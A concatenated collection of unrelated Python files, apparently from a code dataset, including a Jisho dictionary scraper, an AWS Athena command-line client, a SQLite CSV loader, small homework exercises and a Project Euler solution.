    return fmtd_results
def _isolate_meanings(self, meanings_list):
    """Take the meanings list from the DOM and clean out non-informative meanings.

    *meanings_list* is any iterable of elements with a ``.text`` attribute
    (in practice a BeautifulSoup tag whose children are iterated), which is
    why an enumerate-based filter is used rather than slicing.
    """
    index = self._get_meaning_cutoff_index(meanings_list)
    if index:
        # Keep everything before the first non-definition section.
        return [m for i, m in enumerate(meanings_list) if i < index]
    else:
        return meanings_list
def _get_meaning_cutoff_index(self, meanings_list):
    """Return the index of the first non-definition section heading, or None.

    Sections titled "Wikipedia definition", "Other forms" or "Notes" mark
    the end of the actual definitions.
    """
    # NOTE(review): the original compared against "Wikipedia defintiion"
    # (typo), which can never match jisho's "Wikipedia definition"
    # heading; fixed here.
    markers = ("Wikipedia definition", "Other forms", "Notes")
    indices = [i for i, m in enumerate(meanings_list) if m.text in markers]
    # min() instead of the original `a or b or c` chain: `or` both
    # discarded a legitimate index 0 (falsy) and preferred the wiki
    # marker even when another marker appeared earlier in the list.
    return min(indices) if indices else None
def _extract_dictionary_information(self, entry):
    """Take a dictionary entry from Jisho and return all the necessary information.

    Returns a dict with the furigana, the vocabulary word, difficulty
    tags, meanings numbered from 1, the meaning count, and a romanized
    (Halpern) form of the furigana.
    """
    # Clean up the furigana for the result
    furigana = "".join([f.text for f in entry.select(".kanji")])
    # Cleans the vocabulary word for the result
    vocabulary = self._get_full_vocabulary_string(entry) if not entry.select(".concept_light-representation .furigana rt") else entry.select_one(".concept_light-representation .furigana rt").text
    # The fact that this needs to exist is really annoying.
    # If you go to a page like this: https://jisho.org/word/%E5%8D%B0%E5%BA%A6
    # you'll see that this is a word whose furigana is actually in katakana
    # I didn't realize this happens (it makes sense now), and the huge issue
    # is that there's different HTML in this case, so the previous parsing method
    # doesn't work, so we need a new method...
    # Now there could be *really* weird cases where there's a word with both
    # katakana furigana and hiragana furigana (which would be cool), but tbh this
    # I'm satisfied with assuming the whole word corresponds with the whole furigana.
    # Grab the difficulty tags for the result
    diff_tags = [m.text for m in entry.select(".concept_light-tag.label")]
    # Grab each of the meanings associated with the result
    cleaned_meanings = self._isolate_meanings(entry.select_one(".meanings-wrapper"))
    meanings = [m.select_one(".meaning-meaning") for m in cleaned_meanings]
    # Drop section children that have no .meaning-meaning node.
    meanings_texts = [m.text for m in meanings if m != None]
    # Romanize the furigana
    halpern = kana_to_halpern(furigana)
    information = {
        "furigana": furigana,
        "vocabulary": vocabulary,
        "difficulty_tags": diff_tags,
        # Meanings keyed 1..n in page order.
        "meanings": dict(zip(range(1, len(meanings_texts) + 1), meanings_texts)),
        "n_meanings": len(meanings_texts),
        "halpern": halpern
    }
    return information
def _get_full_vocabulary_string(self, html):
    """Return the full furigana of a word from the html.

    Pairs each span in the ``.furigana`` block with the corresponding
    character of the ``.text`` block, preferring the reading span and
    falling back to the inset character when it is kana.
    """
    # The kana representation of the Jisho entry is contained in this div
    text_markup = html.select_one(".concept_light-representation")
    upper_furigana = text_markup.select_one(".furigana").find_all('span')
    # inset_furigana needs more formatting due to potential bits of kanji sticking together
    inset_furigana_list = []
    # For some reason, creating the iterator "inset_furigana" and then accessing it here
    # causes it to change, like observing it causes it to change. I feel like Schrodinger
    for f in text_markup.select_one(".text").children:
        cleaned_text = f.string.replace("\n", "").replace(" ", "")
        if cleaned_text == "":
            continue
        elif len(cleaned_text) > 1:
            # Split multi-character chunks into single characters.
            for s in cleaned_text:
                inset_furigana_list.append(s)
        else:
            inset_furigana_list.append(cleaned_text)
    # NOTE(review): if there are more inset characters than furigana spans,
    # c[0] is None below and `.text` raises — assumes spans >= characters.
    children = zip_longest(upper_furigana, inset_furigana_list)
    full_word = []
    for c in children:
        if c[0].text != '':
            full_word.append(c[0].text)
        elif c[0].text == '' and contains_kana(c[1]):
            full_word.append(c[1])
        else:
            continue
    # print(''.join(full_word))
    # print("====")
    return ''.join(full_word)
if __name__ == '__main__':
    # Smoke test: look up a single kanji interactively.
    j = Jisho()
    j.search_for_kanji("草")
|
12,786 | ed2c934a069db8cdcd728e1f3ed9437655395df7 | # 2. Создать текстовый файл (не программно), сохранить в нем несколько строк,
# выполнить подсчет количества строк, количества слов в каждой строке.
# Count words per line: print "<line number>: <word count>" for each line.
with open('task2.txt', 'r') as f:
    lines = f.readlines()

for number, text in enumerate(lines, start=1):
    print(f'{number}: {len(text.split())}')
12,787 | 2a0a0fe0f527a76401ed930319f7099d9ccce8d2 | """
__author__ = Biswajit Saha
this script creates sqllite schema and batch-loads all csv od matrix
"""
import sqlite3
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer,Float, String, MetaData,Index
import pandas as pd
from pathlib import Path
import time
import logging
def create_logger():
    """Create and return the module logger.

    Logs DEBUG+ to the console and INFO+ to ``db.log``, both with a
    timestamped format.  Guards against attaching duplicate handlers
    (double logging) if called more than once.
    """
    # logger = multiprocessing.get_logger()
    logger = logging.getLogger(__name__)
    logger.setLevel(logging.DEBUG)
    if logger.handlers:
        # Already configured (e.g. module re-imported) — don't double-log.
        return logger
    fmt = '%(asctime)s - %(levelname)s - %(message)s'
    formatter = logging.Formatter(fmt)
    fh = logging.FileHandler("db.log")
    fh.setLevel(logging.INFO)
    fh.setFormatter(formatter)
    logger.addHandler(fh)
    # adding console handler
    consolehandler = logging.StreamHandler()
    consolehandler.setLevel(logging.DEBUG)
    consolehandler.setFormatter(formatter)
    logger.addHandler(consolehandler)
    return logger
logger = create_logger()


def measure(message):
    """Decorator factory: log *message* plus elapsed minutes for each call.

    Usage: ``@measure('loading:')``.
    """
    def decorator(function):
        # Local import keeps the file's top-level import block unchanged.
        from functools import wraps

        @wraps(function)  # preserve the wrapped function's name/docstring
        def wrapper(*args, **kwargs):
            ts = time.time()
            result = function(*args, **kwargs)
            te = time.time()
            minutes_taken = "minutes taken {}".format((te - ts) / 60.0)
            logger.info(f"{message} {minutes_taken}")
            return result
        return wrapper
    return decorator
class Db:
    """SQLite-backed store for the travel-time matrix, bulk-loaded from CSVs."""

    def __init__(self,name):
        # `name` becomes the sqlite file stem: <name>.sqlite3
        self.dbname =name
        self.engine = create_engine(f"sqlite:///{self.dbname}.sqlite3")

    def create_table(self,if_exists_drop=False):
        """Create the `matrix` table; optionally drop and recreate an existing one.

        NOTE(review): Table.exists()/drop()/create() against an engine is
        the pre-1.4 SQLAlchemy API — confirm the pinned version.
        """
        metadata = MetaData()
        MATRIX = Table('matrix', metadata,
            Column('id', Integer, primary_key=True),
            Column('meshblock_id', String(50)),
            Column('centre_name', String(100)),
            Column('stop_id', String(50)),
            Column('time_of_day', String(50)),
            Column('total_minutes', Float),
            # Composite index to serve the main lookup pattern.
            Index("IDX_CENTRENAME_TIMEOFDAY_MINUTES", "centre_name", "time_of_day",'total_minutes' )
        )
        if MATRIX.exists(self.engine):
            if if_exists_drop:
                MATRIX.drop(self.engine)
                MATRIX.create(self.engine)
                print('table re-created')
            else:
                print('table already exists')
        else:
            MATRIX.create(self.engine)
            print('new table created')
        self.table = MATRIX

    def reindex(self):
        # Placeholder — no re-indexing implemented yet.
        #self.engine.execute(sql)
        pass

    @measure('total:')
    def load_csv(self,csv):
        """Append one CSV file's rows to the matrix table (timed by @measure)."""
        df = pd.read_csv(csv)
        df.to_sql('matrix',self.engine,if_exists='append',index =False)
        print(f'{csv} loaded')

    def __del__(self):
        # Release pooled connections when the wrapper is garbage-collected.
        self.engine.dispose()
@measure('Grand Total:')
def load_all_csvs():
    """Recreate the matrix table and append every CSV from ../output/matrix."""
    mydb = Db('CentreAccesByMb')
    mydb.create_table(True)
    csvdir = Path().cwd().parent.joinpath('output').joinpath('matrix')
    for idx, f in enumerate(csvdir.glob('*.csv')):
        mydb.load_csv(f)
        print(f'{idx+1} completed ...')
    # Explicit delete triggers Db.__del__, disposing the engine promptly.
    del mydb
    print('done!')


if __name__ =='__main__':
    load_all_csvs()
|
12,788 | f8869869be0fd265c88b2ada43bdf026981b78f5 | #!/usr/bin/env python
# coding=utf-8
'''
@Description:
@Author: Xuannan
@Date: 2020-01-31 10:46:21
@LastEditTime : 2020-01-31 13:20:33
@LastEditors : Xuannan
'''
from .category import MaitulCategory
from .content import MaitulContent,MaitulContentTag
from .tag import MaitulTag |
12,789 | a1cacb70408fc7d69beda88707e17ec39fe52f6f | #!/usr/bin/env python3
"""
Consider a list (rollnos) containing roll numbers of 20MS students in the
format 20MSid (e.g. 20MS145, here id = 145). Use list comprehension to store
the roll nos in rollnos in a list ‘GroupA’ where id < 150 and store the rest in
another list ‘GroupB’. Print the contents of GroupA and GroupB.
"""
rollnos = ["20MS001", "20MS123", "20MS149", "20MS150", "20MS151", "20MS172"]
# Partition on the numeric id (the digits after the "20MS" prefix).
# id >= 150 is exactly the complement of groupA's id < 150, since equal
# roll strings always carry equal ids.
groupA = [roll for roll in rollnos if int(roll[4:]) < 150]
groupB = [roll for roll in rollnos if int(roll[4:]) >= 150]
print("Roll numbers : ", rollnos)
print("Group A : ", groupA)
print("Group B : ", groupB)
|
12,790 | 8367c2ecad20aadd406d60aeb665e40275982ea9 | # 2. Во втором массиве сохранить индексы четных элементов первого массива.
# Например, если дан массив со значениями 8, 3, 15, 6, 4, 2, то во второй массив надо заполнить
# значениями 0, 3, 4, 5 , т.к. именно в этих позициях первого массива стоят четные числа.
import random
ARRAY_SIZE = 10
VALUES_LOWER_BOUND = 1
VALUES_UPPER_BOUND = 10

# Fill the source array with random values in the configured range.
input_array = [
    random.randint(VALUES_LOWER_BOUND, VALUES_UPPER_BOUND)
    for _ in range(ARRAY_SIZE)
]
print('Входной массив:')
print(input_array)

# Collect the positions of the even elements.
output_array = [idx for idx, value in enumerate(input_array) if value % 2 == 0]
print('Массив индексов четных элементов:')
print(output_array)
12,791 | dd395cb68109ff51299a37dbd9297e023e4322c3 | import Deque
def arrange(aList):
    """Reorder *aList* with a deque so elements drained from the rear come first.

    Negatives are added at the rear, non-negatives at the front, and the
    deque is then drained from the rear — so negatives come out before the
    non-negatives.  (The exact ordering depends on the Deque class's
    add/remove semantics — confirm against Deque.py.)
    """
    arranged = []
    d = Deque.Deque()
    for item in aList:
        if item < 0:
            d.add_rear(item)
        else:
            d.add_front(item)
    while not d.is_empty():
        arranged.append(d.remove_rear())
    return arranged


print(arrange([-3, 12, 6, -7]))
# Removed the stray no-argument `arrange()` call that followed the demo:
# arrange() requires `aList`, so it always raised TypeError.
|
12,792 | c1dbde93e572046cba54bc2be924459e407d3136 | from tkinter import *
master = Tk()
master.geometry('600x400')
master.config(bg='skyblue')
master.title('Second Screen')

# Age entry widgets.
age = Label(master, text='Please Enter Your Age:', borderwidth=5)
age.place(x=10, y=10)
age_entry = Entry(master, borderwidth=5)
age_entry.place(x=200, y=10)

from datetime import date, timedelta

# Age in whole years from a hard-coded date of birth; 365.245 approximates
# the average year length including leap years.
dob = date(1999, 1, 20)
age = (date.today() - dob)//timedelta(days=365.245)


def age():
    # NOTE(review): this function shadows the `age` value above (the name
    # is rebound three times in this script) and was left unfinished in
    # the original — the `if` had no colon and no body, a SyntaxError.
    # Made syntactically valid; fill in the intended match behaviour.
    valid_ages = ['16']
    for x in range(len(valid_ages)):
        if age_entry.get() == valid_ages[x]:
            pass  # TODO: the original never specified what happens on a match


master.mainloop()
|
12,793 | e20ac1e43a1218eeb9108012a9319f7b0751245a | import re
f = open("dates",'r')
mon = {'01': 'January', '02': 'February', '03': 'March',
'04': 'April', '05': 'May', '06': 'June',
'07': 'July', '08': 'August', '09': 'September',
'10': 'October', '11': 'November', '12': 'December'}
r1 = re.compile("(\d*)-(\d*)-(\d*)\s*(\d*):(\d*):(\d*)")
def convert(line):
m = r1.match(line)
if m != None:
year = int(m.group(1))
month = m.group(2)
day = int(m.group(3))
hour = int(m.group(4))
minute = int(m.group(5))
seconds = int(m.group(6))
if (hour >= 12):
time = "pm"
else:
time = "am"
if (hour == 0):
hour = 12;
if (hour != 12):
hour = hour % 12;
#10:03 pm, April 20, 2004
print '%d:%02d %s, %s %d, %d' % (hour,minute,time, mon[month],day,year)
while True:
line = f.readline()
convert(line)
if not line:
break
|
12,794 | f79f9bdfc66a2394d3d44c4d9eb327b10ad4875f |
import argparse
import atexit
import csv
import json
import os
import readline
import subprocess
import sys
import time
import uuid
import boto3
import botocore
import cmd2 as cmd
from botocore.exceptions import ClientError, ParamValidationError
from tabulate import tabulate
LESS = "less -FXRSn"     # default pager command (override via ATHENA_CLI_PAGER)
HISTORY_FILE_SIZE = 500  # max readline history entries kept in ~/.athena_history

__version__ = '0.1.8'
class AthenaBatch(object):
    """Non-interactive runner: execute one statement and print results to stdout.

    `format` selects the output style: CSV, CSV_HEADER, TSV, TSV_HEADER,
    VERTICAL, or anything else for an aligned presto-style table.
    """

    def __init__(self, athena, db=None, format='CSV'):
        self.athena = athena
        self.dbname = db
        self.format = format

    def execute(self, statement):
        """Start *statement*, poll until it finishes, then print per self.format."""
        execution_id = self.athena.start_query_execution(self.dbname, statement)
        if not execution_id:
            return

        # Poll until the query reaches a terminal state.
        while True:
            stats = self.athena.get_query_execution(execution_id)
            status = stats['QueryExecution']['Status']['State']
            if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']:
                break
            time.sleep(0.2)  # 200ms

        if status == 'SUCCEEDED':
            results = self.athena.get_query_results(execution_id)
            # NOTE(review): .encode() yields bytes objects under Python 3,
            # so CSV/TSV output prints b'...' reprs there — Python-2 era code.
            headers = [h['Name'].encode("utf-8") for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']]

            if self.format in ['CSV', 'CSV_HEADER']:
                csv_writer = csv.writer(sys.stdout, quoting=csv.QUOTE_ALL)
                if self.format == 'CSV_HEADER':
                    csv_writer.writerow(headers)
                csv_writer.writerows([[text.encode("utf-8") for text in row] for row in self.athena.yield_rows(results, headers)])
            elif self.format == 'TSV':
                print(tabulate([row for row in self.athena.yield_rows(results, headers)], tablefmt='tsv'))
            elif self.format == 'TSV_HEADER':
                print(tabulate([row for row in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='tsv'))
            elif self.format == 'VERTICAL':
                # One "--[RECORD n]--" banner per row, columns listed vertically.
                for num, row in enumerate(self.athena.yield_rows(results, headers)):
                    print('--[RECORD {}]--'.format(num+1))
                    print(tabulate(zip(*[headers, row]), tablefmt='presto'))
            else:  # ALIGNED
                print(tabulate([x for x in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='presto'))

        if status == 'FAILED':
            print(stats['QueryExecution']['Status']['StateChangeReason'])
# "show" is both a cmd2 built-in and an Athena SQL statement; drop the
# built-in so AthenaShell.default() handles SHOW queries instead.
try:
    del cmd.Cmd.do_show  # "show" is an Athena command
except AttributeError:
    # "show" was removed from Cmd2 0.8.0
    pass
class AthenaShell(cmd.Cmd, object):
    """Interactive cmd2-based shell for running Athena queries.

    Adds readline history persistence, Ctrl-C query cancellation and
    paged result display on top of cmd2's line editing.
    """

    # SQL keywords that may start a statement continued over several lines.
    multilineCommands = ['WITH', 'SELECT', 'ALTER', 'CREATE', 'DESCRIBE', 'DROP', 'MSCK', 'SHOW', 'USE', 'VALUES']
    allow_cli_args = False

    def __init__(self, athena, db=None):
        cmd.Cmd.__init__(self)
        self.athena = athena
        self.dbname = db
        self.execution_id = None  # id of the in-flight query, for cancellation
        self.row_count = 0
        self.set_prompt()
        self.pager = os.environ.get('ATHENA_CLI_PAGER', LESS).split(' ')
        self.hist_file = os.path.join(os.path.expanduser("~"), ".athena_history")
        self.init_history()

    def set_prompt(self):
        # Show the current schema in the prompt when one is set.
        self.prompt = 'athena:%s> ' % self.dbname if self.dbname else 'athena> '

    def cmdloop_with_cancel(self, intro=None):
        """Run the command loop; Ctrl-C cancels the in-flight query, not the shell."""
        try:
            self.cmdloop(intro)
        except KeyboardInterrupt:
            if self.execution_id:
                self.athena.stop_query_execution(self.execution_id)
                print('\n\n%s' % self.athena.console_link(self.execution_id))
                print('\nQuery aborted by user')
            else:
                print('\r')
            # Restart the loop so the shell survives the interrupt.
            self.cmdloop_with_cancel(intro)

    def preloop(self):
        if os.path.exists(self.hist_file):
            readline.read_history_file(self.hist_file)

    def postloop(self):
        self.save_history()

    def init_history(self):
        """Load (or create) the readline history file and register save-on-exit."""
        try:
            readline.read_history_file(self.hist_file)
            readline.set_history_length(HISTORY_FILE_SIZE)
            readline.write_history_file(self.hist_file)
        except IOError:
            readline.write_history_file(self.hist_file)
        atexit.register(self.save_history)

    def save_history(self):
        try:
            readline.write_history_file(self.hist_file)
        except IOError:
            pass

    def do_help(self, arg):
        help_output = """
Supported commands:
QUIT
SELECT
ALTER DATABASE <schema>
ALTER TABLE <table>
CREATE DATABASE <schema>
CREATE TABLE <table>
DESCRIBE <table>
DROP DATABASE <schema>
DROP TABLE <table>
MSCK REPAIR TABLE <table>
SHOW COLUMNS FROM <table>
SHOW CREATE TABLE <table>
SHOW DATABASES [LIKE <pattern>]
SHOW PARTITIONS <table>
SHOW TABLES [IN <schema>] [<pattern>]
SHOW TBLPROPERTIES <table>
USE [<catalog>.]<schema>
VALUES row [, ...]

See http://docs.aws.amazon.com/athena/latest/ug/language-reference.html
"""
        print(help_output)

    def do_quit(self, arg):
        print()
        return -1  # non-zero return value ends the cmd loop

    def do_EOF(self, arg):
        # Ctrl-D behaves like "quit".
        return self.do_quit(arg)

    def do_use(self, schema):
        """Switch the session's default schema."""
        self.dbname = schema.rstrip(';')
        self.set_prompt()

    def do_set(self, arg):
        """Handle `set debug <bool>`; anything else falls through to cmd2's set."""
        try:
            statement, param_name, val = arg.parsed.raw.split(None, 2)
            val = val.strip()
            param_name = param_name.strip().lower()
            if param_name == 'debug':
                self.athena.debug = cmd.cast(True, val)
        except (ValueError, AttributeError):
            self.do_show(arg)
        super(AthenaShell, self).do_set(arg)

    def default(self, line):
        """Execute any other input as an Athena SQL statement and page results."""
        self.execution_id = self.athena.start_query_execution(self.dbname, line.full_parsed_statement())
        if not self.execution_id:
            return

        # Poll until a terminal state, showing a one-line status spinner.
        while True:
            stats = self.athena.get_query_execution(self.execution_id)
            status = stats['QueryExecution']['Status']['State']
            status_line = 'Query {0}, {1:9}'.format(self.execution_id, status)
            sys.stdout.write('\r' + status_line)
            sys.stdout.flush()
            if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']:
                break
            time.sleep(0.2)  # 200ms

        sys.stdout.write('\r' + ' ' * len(status_line) + '\r')  # delete query status line
        sys.stdout.flush()

        if status == 'SUCCEEDED':
            results = self.athena.get_query_results(self.execution_id)
            headers = [h['Name'] for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']]
            row_count = len(results['ResultSet']['Rows'])

            # Athena sometimes repeats the header as the first data row.
            if headers and len(results['ResultSet']['Rows']) and results['ResultSet']['Rows'][0]['Data'][0].get('VarCharValue', None) == headers[0]:
                row_count -= 1  # don't count header

            # Pipe the formatted table through the configured pager.
            process = subprocess.Popen(self.pager, stdin=subprocess.PIPE)
            process.stdin.write(tabulate([x for x in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='presto').encode('utf-8'))
            process.communicate()
            print('(%s rows)\n' % row_count)

        print('Query {0}, {1}'.format(self.execution_id, status))
        if status == 'FAILED':
            print(stats['QueryExecution']['Status']['StateChangeReason'])
        print(self.athena.console_link(self.execution_id))

        # Timing / cost summary ($5 per TB scanned).
        submission_date = stats['QueryExecution']['Status']['SubmissionDateTime']
        completion_date = stats['QueryExecution']['Status']['CompletionDateTime']
        execution_time = stats['QueryExecution']['Statistics']['EngineExecutionTimeInMillis']
        data_scanned = stats['QueryExecution']['Statistics']['DataScannedInBytes']
        query_cost = data_scanned / 1000000000000.0 * 5.0

        print('Time: {}, CPU Time: {}ms total, Data Scanned: {}, Cost: ${:,.2f}\n'.format(
            str(completion_date - submission_date).split('.')[0],
            execution_time,
            human_readable(data_scanned),
            query_cost
        ))
class Athena(object):
    """Thin wrapper over the boto3 Athena client (start/poll/fetch/stop)."""

    def __init__(self, profile, region=None, bucket=None, debug=False, encryption=False):
        self.session = boto3.Session(profile_name=profile, region_name=region)
        self.athena = self.session.client('athena')
        self.region = region or os.environ.get('AWS_DEFAULT_REGION', None) or self.session.region_name
        self.bucket = bucket or self.default_bucket
        self.debug = debug
        self.encryption = encryption

    @property
    def default_bucket(self):
        # Per-account, per-region default results bucket.
        account_id = self.session.client('sts').get_caller_identity().get('Account')
        return 's3://{}-query-results-{}-{}'.format(self.session.profile_name or 'aws-athena', account_id, self.region)

    def start_query_execution(self, db, query):
        """Start *query* against schema *db*; return the execution id or None on error."""
        try:
            if not db:
                raise ValueError('Schema must be specified when session schema is not set')

            result_configuration = {
                'OutputLocation': self.bucket,
            }
            if self.encryption:
                result_configuration['EncryptionConfiguration'] = {
                    'EncryptionOption': 'SSE_S3'
                }

            return self.athena.start_query_execution(
                QueryString=query,
                ClientRequestToken=str(uuid.uuid4()),
                QueryExecutionContext={
                    'Database': db
                },
                ResultConfiguration=result_configuration
            )['QueryExecutionId']
        except (ClientError, ParamValidationError, ValueError) as e:
            print(e)
            return

    def get_query_execution(self, execution_id):
        """Return the execution's status/statistics dict (None printed on error)."""
        try:
            return self.athena.get_query_execution(
                QueryExecutionId=execution_id
            )
        except ClientError as e:
            print(e)

    def get_query_results(self, execution_id):
        """Fetch all result pages and merge their rows into one response dict."""
        try:
            results = None
            paginator = self.athena.get_paginator('get_query_results')
            page_iterator = paginator.paginate(
                QueryExecutionId=execution_id
            )
            for page in page_iterator:
                if results is None:
                    results = page
                else:
                    results['ResultSet']['Rows'].extend(page['ResultSet']['Rows'])
        except ClientError as e:
            sys.exit(e)

        if self.debug:
            print(json.dumps(results, indent=2))

        return results

    def stop_query_execution(self, execution_id):
        try:
            return self.athena.stop_query_execution(
                QueryExecutionId=execution_id
            )
        except ClientError as e:
            sys.exit(e)

    @staticmethod
    def yield_rows(results, headers):
        """Yield each data row as a list of strings, skipping a repeated header row."""
        for row in results['ResultSet']['Rows']:
            # https://forums.aws.amazon.com/thread.jspa?threadID=256505
            if headers and row['Data'][0].get('VarCharValue', None) == headers[0]:
                continue  # skip header
            yield [d.get('VarCharValue', 'NULL') for d in row['Data']]

    def console_link(self, execution_id):
        """Return the AWS console URL for this query execution.

        Fix: the original format string contained 'force®ion' — an
        HTML-entity mojibake of 'force&region' — producing a broken link.
        """
        return 'https://{0}.console.aws.amazon.com/athena/home?force&region={0}#query/history/{1}'.format(self.region, execution_id)
def human_readable(size, precision=2):
    """Format a byte count as a short human-readable string, e.g. '1.50KB'.

    size: number of bytes; precision: decimal places in the output.
    """
    suffixes = ['B', 'KB', 'MB', 'GB', 'TB']
    suffix_index = 0
    # >= so that exactly 1024 bytes reports as "1.00KB" rather than
    # "1024.00B" (the original used a strict >); stop at TB, the largest
    # suffix available.
    while size >= 1024 and suffix_index < len(suffixes) - 1:
        suffix_index += 1      # increment the index of the suffix
        size = size / 1024.0   # apply the division
    return "%.*f%s" % (precision, size, suffixes[suffix_index])
def main():
    """Parse CLI arguments and run either batch mode (--execute) or the shell."""
    parser = argparse.ArgumentParser(
        prog='athena',
        usage='athena [--debug] [--execute <statement>] [--output-format <format>] [--schema <schema>]'
              ' [--profile <profile>] [--region <region>] [--s3-bucket <bucket>] [--server-side-encryption] [--version]',
        description='Athena interactive console'
    )
    parser.add_argument(
        '--debug',
        action='store_true',
        help='enable debug mode'
    )
    parser.add_argument(
        '--execute',
        metavar='STATEMENT',
        help='execute statement in batch mode'
    )
    parser.add_argument(
        '--output-format',
        dest='format',
        help='output format for batch mode [ALIGNED, VERTICAL, CSV, TSV, CSV_HEADER, TSV_HEADER, NULL]'
    )
    parser.add_argument(
        '--schema',
        '--database',
        '--db',
        help='default schema'
    )
    parser.add_argument(
        '--profile',
        help='AWS profile'
    )
    parser.add_argument(
        '--region',
        help='AWS region'
    )
    parser.add_argument(
        '--s3-bucket',
        '--bucket',
        dest='bucket',
        help='AWS S3 bucket for query results'
    )
    parser.add_argument(
        '--server-side-encryption',
        '--encryption',
        dest='encryption',
        action='store_true',
        help='Use server-side-encryption for query results'
    )
    parser.add_argument(
        '--version',
        action='store_true',
        help='show version info and exit'
    )
    args = parser.parse_args()

    if args.debug:
        boto3.set_stream_logger(name='botocore')

    if args.version:
        print('Athena CLI %s' % __version__)
        sys.exit()

    # Fall back to the standard AWS profile environment variables.
    profile = args.profile or os.environ.get('AWS_DEFAULT_PROFILE', None) or os.environ.get('AWS_PROFILE', None)

    try:
        athena = Athena(profile, region=args.region, bucket=args.bucket, debug=args.debug, encryption=args.encryption)
    except botocore.exceptions.ClientError as e:
        sys.exit(e)

    if args.execute:
        batch = AthenaBatch(athena, db=args.schema, format=args.format)
        batch.execute(statement=args.execute)
    else:
        shell = AthenaShell(athena, db=args.schema)
        shell.cmdloop_with_cancel()


if __name__ == '__main__':
    main()
|
12,795 | 486af34172763e20a9d3f323aa20748292d3230e | from js9 import j
class cloudbroker_location(j.tools.code.classGetBase()):
    """
    Operator actions for handling interventions on a grid.

    All action methods are generated stubs that raise NotImplementedError
    until implemented.
    """
    def __init__(self):
        pass
        # NOTE(review): the statements below DO run — `pass` is a no-op,
        # not a return — but the `pass` itself is dead code.
        self._te={}
        self.actorname="location"
        self.appname="cloudbroker"
        #cloudbroker_location_osis.__init__(self)

    def add(self, name, **kwargs):
        """
        Adds a location/grid
        param:name Name of the location
        result
        """
        #put your code here to implement this method
        raise NotImplementedError ("not implemented method add")

    def checkVMs(self, locationId, **kwargs):
        """
        Run checkvms jumpscript
        param:locationId id of the grid
        result
        """
        #put your code here to implement this method
        raise NotImplementedError ("not implemented method checkVMs")

    def delete(self, locationId, **kwargs):
        """
        Delete location
        param:locationId id of the location
        result
        """
        #put your code here to implement this method
        raise NotImplementedError ("not implemented method delete")

    def purgeLogs(self, locationId, age, **kwargs):
        """
        Remove logs & eco’s
        By default the logs en eco's older than than 1 week but this can be overriden
        param:locationId id of the grid
        param:age by default 1 week (-1h, -1w TODO: check the options in the jsgrid purgelogs)
        result
        """
        #put your code here to implement this method
        raise NotImplementedError ("not implemented method purgeLogs")

    def update(self, locationId, name, apiUrl, apiToken, **kwargs):
        """
        Rename a grid/location
        param:locationId id of the location
        param:name New name of the location
        param:apiUrl New API URL
        param:apiToken Token to authenticate with api
        result
        """
        #put your code here to implement this method
        raise NotImplementedError ("not implemented method update")
12,796 | 321378a89c5e76b0d55e6b14b3219e5f357b418e | #!/bin/python3
# TIME CONVERSION
import os
import sys
#
# Convert AM/PM time to military time
#
# Sample input:
# 07:05:45PM
# Sample output:
# 19:05:45
#
def timeConversion(s):
    """Convert a 12-hour clock string like '07:05:45PM' to 24-hour '19:05:45'.

    Expects the fixed format hh:mm:ssAM or hh:mm:ssPM.
    """
    hour, rest = int(s[:2]), s[2:8]
    period = s[-2:]
    # 12 o'clock wraps to 0 before the PM offset: 12AM -> 00, 12PM -> 12.
    hour %= 12
    if period == 'PM':
        hour += 12
    return "{:02d}{}".format(hour, rest)
if __name__ == '__main__':
    # Interactive entry point: prompt for a 12-hour time and print the
    # 24-hour conversion (the file-output variant is kept commented out).
    # f = open(os.environ['OUTPUT_PATH'], 'w')
    s = input("Enter time in AM/PM format for example (07:00:00PM):")
    result = timeConversion(s)
    print(result)
    # f.write(result + '\n')
    # f.close()
|
12,797 | b3e8a2dbbd86ef5ced5af2ca286719e3d8818c41 | #!/usr/bin/python
# Imports #
import sys
sys.path.insert(0, "../../include/python/");
import eulersupport;
import eulermath;
def f(n):
    """Return True when n can be written as prime + 2*square (primes count).

    Python 2 code (xrange, print statement).
    """
    #We treat prime as number that can be written.
    if(eulermath.PrimesHelper().is_prime(n)):
        return True;
    # NOTE(review): despite its name, find_all_primes_up_to_n is used here
    # as if it returns a single prime — confirm its contract in eulermath.
    closest_prime = eulermath.PrimesHelper().find_all_primes_up_to_n(n);
    index_of_prime = eulermath.PrimesHelper().get_index_of_prime(closest_prime);
    #First prime, if we cannot add a sum of prime + 2 * square
    #with this prime (2) we found a number that cannot be written.
    while(closest_prime != 2):
        #Increase the square until the sum be greater than number.
        for i in xrange(1, n):
            current_square = i ** 2;
            s = closest_prime + (2 * current_square);
            #The number of formula p + 2*sq is greater
            #than your target number, go out of square loop.
            #and try to decrease the prime.
            if(s > n): break;
            #We found our number.
            if(s == n):
                print "%d : [ %d + (2 * %d^2) ]" %(n, closest_prime, i);
                return True;
        #Find the previous prime.
        index_of_prime -= 1;
        closest_prime = eulermath.PrimesHelper().get_prime_at_index(index_of_prime);
    return False;
# Functions #
# Problem description:
# It was proposed by Christian Goldbach that every odd composite number can be
# written as the sum of a prime and twice a square.
# 9 = 7 + (2 * 1^2)
# 15 = 7 + (2 * 2^2)
# 21 = 3 + (2 * 3^2)
# 25 = 7 + (2 * 3^2)
# 27 = 19 + (2 * 2^2)
# 33 = 31 + (2 * 1^2)
# It turns out that the conjecture was false.
# What is the smallest odd composite that cannot be written as the sum of
# a prime and twice a square?
def run():
    """Search odd numbers from 9 upward for the first one that fails f()."""
    result = -1;
    # infinite_range(9, 2): presumably odd numbers starting at 9 — confirm
    # the step semantics in eulermath.
    for i in eulermath.infinite_range(9, 2):
        if(not f(i)):
            result = i;
            break;
    print result;
    #Report Completion.
    eulersupport.write_output(result);


def run_full():
    """Full run mode: set the problem name and execute the search."""
    eulersupport.name = "euler46";
    run();


def run_test():
    """Test run mode: this problem opts out of testing."""
    eulersupport.name = "euler46-Test";
    eulersupport.write_output("I'd not test");


def main():
    # Dispatch on the run mode supplied by the support library.
    run_mode = eulersupport.get_run_mode();
    if(run_mode == eulersupport.kRunModeFull):
        run_full();
    else:
        run_test();


if __name__ == '__main__':
    main();
|
12,798 | 055c71ea2294a2fcc00b4d0172cf38678128ac54 | import urllib2
import random
import MySQLdb
import pprint
import pdb
from events.models import Event, Meta
from datetime import datetime
